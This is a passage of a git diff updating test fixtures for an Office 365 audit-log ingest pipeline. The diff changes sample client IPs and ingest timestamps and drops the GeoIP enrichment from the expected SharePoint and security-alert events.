\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", + "ingested": "2021-12-09T13:42:45.343199Z", + "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": 
\"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json index ceb345d274e..61c420accc6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json 
@@ -47,7 +47,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428596900Z", + "ingested": "2021-12-09T13:42:45.620853800Z", "original": "{\"AlertEntityId\":\"asr@testsiem.onmicrosoft.com\",\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/alert\"},{\"AlertLinkHref\":\"http://example.net/info\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\",\"EntityType\":\"User\",\"Id\":\"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", 
@@ -110,7 +110,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428603900Z", + "ingested": "2021-12-09T13:42:45.620863900Z", "original": "{\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/single\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", 
@@ -172,7 +172,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428606300Z", + "ingested": "2021-12-09T13:42:45.620869900Z", "original": "{\"AlertEntityId\":\"Malware/Evil.Malware.B\",\"AlertId\":\"1233344-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"This is a phony threat alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"something\\\":\\\"blabla\\\"}\",\"EntityType\":\"MalwareFamily\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Phony Malware Alert\",\"ObjectId\":\"12345678-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"High\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json index de2b2b919c2..e2321371e61 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json 
@@ -2,10 +2,10 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": 
"622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, 
@@ -29,10 +29,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": 
"622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, 
@@ -56,10 +56,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": 
"622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, 
@@ -83,10 +83,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": 
"622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json index 2a1fd2d27a5..221a8449059 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -55,7 +37,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -67,12 +49,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521149500Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953082200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -108,25 +90,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -161,7 +125,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -173,12 +137,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521156700Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953091200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -214,25 +178,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -267,7 +213,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -279,12 +225,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521166500Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953097300Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -320,25 +266,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -373,7 +301,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
